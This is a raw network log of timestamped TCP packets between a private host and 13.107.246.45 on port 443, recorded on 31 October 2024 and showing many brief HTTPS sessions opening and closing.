Oct 31, 2024 19:20:03.710114002 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.710336924 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.710381031 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.712028980 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.712059021 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.712066889 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.712073088 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.714875937 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.714875937 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.714889050 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.714898109 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.728655100 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.728669882 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.728693008 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.728714943 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.728751898 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.728804111 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.730077982 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.730128050 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.730209112 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.730644941 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.730676889 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.730726957 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.731204987 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.731230974 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.731306076 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.731327057 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.731390953 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.731406927 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.731895924 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.731920004 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.731973886 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.732034922 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.732047081 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.732122898 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.732127905 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.880177021 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.881633997 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.882262945 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.882294893 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.882320881 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.882339001 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.882797003 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.882810116 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.883048058 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.883055925 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.884306908 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.884692907 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.884715080 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.884752035 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.885113001 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.885119915 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.885313988 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.885346889 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.885752916 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.885759115 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.888382912 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.890358925 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.890374899 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:04.890755892 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:04.890762091 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.009622097 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.009677887 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.009815931 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.010009050 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.010094881 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.010118008 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.010133028 CET	51275	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.010138988 CET	443	51275	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.010205984 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.011331081 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.011461020 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.011473894 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.011486053 CET	51273	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.011490107 CET	443	51273	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.013932943 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.013958931 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.014018059 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.014245987 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.014256954 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.014262915 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.014281988 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.014331102 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.014514923 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.014529943 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.015104055 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.015913010 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.015983105 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.015983105 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.016007900 CET	51271	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.016021013 CET	443	51271	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.016730070 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.016894102 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.017049074 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.017103910 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.017113924 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.017138958 CET	51272	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.017146111 CET	443	51272	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020035028 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020050049 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020129919 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020216942 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020245075 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020262003 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020288944 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020350933 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020503044 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020504951 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020517111 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020625114 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020629883 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.020641088 CET	51274	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.020644903 CET	443	51274	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.021155119 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.021167040 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.022564888 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.022586107 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.022653103 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.022824049 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.022835016 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.746331930 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.747510910 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.748121023 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.749758005 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.749789953 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.750258923 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.750267982 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.750463963 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.750493050 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.750798941 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.750804901 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.751399040 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.751411915 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.751754999 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.751759052 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.760214090 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.762600899 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.762629032 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.762988091 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.762994051 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.769133091 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.770592928 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.770605087 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.770994902 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.770998955 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.875543118 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.875736952 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.875859022 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.877682924 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.877741098 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.877790928 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.881223917 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.881275892 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.881323099 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.901211023 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.902976036 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.903064013 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.906150103 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.906183004 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.906197071 CET	51280	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.906204939 CET	443	51280	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.918785095 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.919092894 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.919187069 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.946948051 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.946964025 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.946975946 CET	51278	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.946980953 CET	443	51278	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.948141098 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.948158026 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.948173046 CET	51279	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.948179960 CET	443	51279	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.949052095 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.949058056 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.949069977 CET	51276	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.949074030 CET	443	51276	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.949913979 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.949919939 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:05.949950933 CET	51277	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:05.949955940 CET	443	51277	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.109738111 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.109787941 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.109850883 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.131992102 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.132009029 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.142946005 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.143019915 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.143096924 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.146831989 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.146862030 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.153939962 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.153961897 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.154040098 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.156274080 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.156286955 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.157432079 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157464981 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157475948 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.157497883 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.157535076 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157571077 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157682896 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157696009 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.157784939 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.157795906 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.869415045 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.870349884 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.870384932 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.870873928 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.870878935 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.878036976 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.878392935 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.878429890 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.878752947 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.878761053 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.889486074 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.889908075 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.889918089 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.890242100 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.890247107 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.892977953 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.893040895 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.893238068 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.893261909 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.893421888 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.893456936 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.893594027 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.893599033 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:06.893909931 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:06.893917084 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.002171993 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.002876997 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.002952099 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.002980947 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.002998114 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.003011942 CET	51281	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.003017902 CET	443	51281	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.005839109 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.005872011 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.005934000 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.006277084 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.006289959 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.008424997 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.008958101 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.009012938 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.009076118 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.009099007 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.009111881 CET	51282	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.009116888 CET	443	51282	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.011183023 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.011207104 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.011297941 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.011411905 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.011425972 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.024923086 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.024976969 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025033951 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025118113 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025204897 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025228977 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025240898 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025247097 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025254965 CET	51285	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025259972 CET	443	51285	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025346041 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025360107 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.025369883 CET	51284	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.025374889 CET	443	51284	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.027267933 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.027604103 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.027661085 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028038979 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028044939 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.028069019 CET	51283	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028072119 CET	443	51283	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.028284073 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028338909 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.028413057 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028419018 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028443098 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.028491974 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028556108 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028574944 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.028620005 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.028634071 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.030422926 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.030436993 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.030555964 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.030647039 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.030661106 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.737075090 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.737696886 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.737709045 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.738218069 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.738223076 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.741688013 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.742204905 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.742230892 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.742598057 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.742604017 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.763468981 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.763835907 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.763984919 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.763997078 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.764419079 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.764425039 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.764689922 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.764720917 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.765099049 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.765105009 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.769522905 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.769867897 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.769876003 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:07.770241976 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:07.770247936 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592012882 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592084885 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592144966 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592160940 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.592209101 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592677116 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592735052 CET	443	51288	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592756987 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.592776060 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.592782021 CET	51288	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.592858076 CET	443	51289	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.593672037 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.593713999 CET	443	51290	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.593722105 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.593749046 CET	51290	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.601457119 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.601475000 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.601505041 CET	51286	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.601511002 CET	443	51286	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.605003119 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.605017900 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.605057955 CET	51287	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.605068922 CET	443	51287	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:08.678042889 CET	51289	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:08.678067923 CET	443	51289	13.107.246.45	192.168.2.4
